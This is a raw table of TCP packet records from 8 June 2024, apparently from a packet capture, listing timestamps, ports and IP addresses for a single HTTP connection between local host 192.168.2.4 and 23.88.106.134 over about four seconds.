Jun 8, 2024 20:22:01.793674946 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.796506882 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.796523094 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.796593904 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.796642065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.799123049 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.799158096 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.799184084 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.799223900 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.801745892 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.801779032 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.801810026 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.801842928 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.804141045 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.804174900 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.804207087 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.804208040 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.804229975 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.804266930 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.806525946 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.806560040 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.806643963 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.806684971 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.808968067 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.809003115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.809037924 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.809040070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.809062004 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.809098959 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.811391115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.811424971 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.811463118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.811492920 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.813543081 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.813576937 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.813611031 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.813641071 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.815737009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.815771103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.815802097 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.815804005 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.815824032 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.815860033 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.817805052 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.817840099 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.817893982 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.817924976 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.819858074 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.819922924 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.820858955 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.820894003 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.820924997 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.820955992 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.822717905 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.822752953 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.822802067 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.822803020 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.824659109 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.824693918 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.824726105 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.824727058 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.824747086 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.824783087 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.826539040 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.826572895 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.826603889 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.826631069 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.826668978 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.826668978 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.828425884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.828459978 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.828528881 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.828528881 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.830276966 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.830312014 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.830344915 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.830379009 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.832115889 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.832165003 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.832182884 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.832222939 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.833625078 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.833659887 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.833692074 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.833693027 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.833714962 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.833758116 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.835196018 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.835232973 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.835262060 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.835285902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.836663961 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.836698055 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.836730957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.836733103 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.836755037 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.836788893 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.838057995 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.838092089 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.838121891 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.838121891 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.838145018 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.838180065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.839473009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.839509010 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.839562893 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.839595079 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.840761900 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.840795994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.840826988 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.840847969 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.840858936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.840915918 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.842220068 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.842272997 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.842287064 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.842334986 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.843385935 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.843424082 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.843451023 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.843457937 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.843476057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.843513012 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.844641924 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.844677925 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.844708920 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.844739914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.845937014 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.845971107 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.846002102 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.846005917 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.846025944 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.846048117 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.847162008 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.847197056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.847224951 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.847256899 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.848433018 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.848467112 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.848522902 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.848526955 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.848526955 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.848582983 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.849602938 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.849636078 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.849666119 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.849690914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.849720001 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.849740028 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.850755930 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.850789070 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.850815058 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.850845098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.851836920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.851870060 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.851901054 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.851932049 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.853039026 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.853104115 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.853492022 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.853524923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.853554010 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.853554964 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.853575945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.853611946 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.854562044 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.854595900 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.854626894 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.854659081 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.855504990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.855539083 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.855568886 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.855571032 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.855590105 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.855632067 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.856504917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.856539011 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.856561899 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.856594086 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.857420921 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.857455015 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.857487917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.857490063 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.857507944 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.857544899 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.858347893 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.858381033 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.858412981 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.858416080 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.858433962 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.858474970 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.859287977 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.859322071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.859353065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.859385014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.860215902 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.860249043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.860299110 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.860331059 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.861162901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.861198902 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.861231089 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.861272097 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.862144947 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.862179995 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.862210989 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.862214088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.862230062 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.862272024 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.862987041 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.863022089 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.863053083 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.863086939 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.863878965 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.863928080 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.863956928 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.863960028 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.863979101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.864007950 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.864753008 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.864789009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.864820004 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.864851952 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.865634918 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.865669966 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.865701914 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.865701914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.865724087 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.865760088 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.866344929 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.866378069 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.866406918 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.866410017 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.866431952 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.866461992 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.867110968 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.867146015 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.867172956 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.867203951 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.867841005 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.867877007 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.867904902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.867935896 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.868561983 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.868596077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.868627071 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.868659019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.869275093 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.869311094 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.869339943 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.869342089 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.869363070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.869391918 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.869913101 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.869946957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.869978905 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.869982958 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.870002031 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.870032072 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.870623112 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.870656967 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.870690107 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.870708942 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.870745897 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.870745897 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.871644020 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.871676922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.871705055 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.871737003 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.872256041 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.872292042 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.872323036 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.872353077 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:02.197235107 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:02.197325945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:02.202573061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:02.202615976 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:02.202646971 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:02.202702999 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:02.202732086 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:02.474101067 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:02.474299908 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:02.609858990 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:02.609859943 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:02.614923000 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:02.614943027 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:02.614957094 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:02.876173019 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:02.876373053 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:02.894689083 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:02.900099993 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:03.153748035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:03.153841972 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:03.496107101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:03.794855118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:04.326598883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:04.326642990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:04.576541901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:04.576988935 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:04.761312008 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:04.766565084 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.009850979 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.009929895 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.009927034 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.009948969 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.010029078 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.010029078 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.010565042 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.010585070 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.010617018 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.010651112 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.011120081 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.011137009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.011174917 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.011174917 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.011825085 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.011842966 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.011857986 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.011883020 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.011883020 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.011917114 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.012547016 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.012564898 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.012587070 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.012607098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.012641907 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.012641907 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.134839058 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.134933949 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.134949923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.135117054 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.135118008 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.135118008 CEST	49731	80	192.168.2.4	23.88.106.134
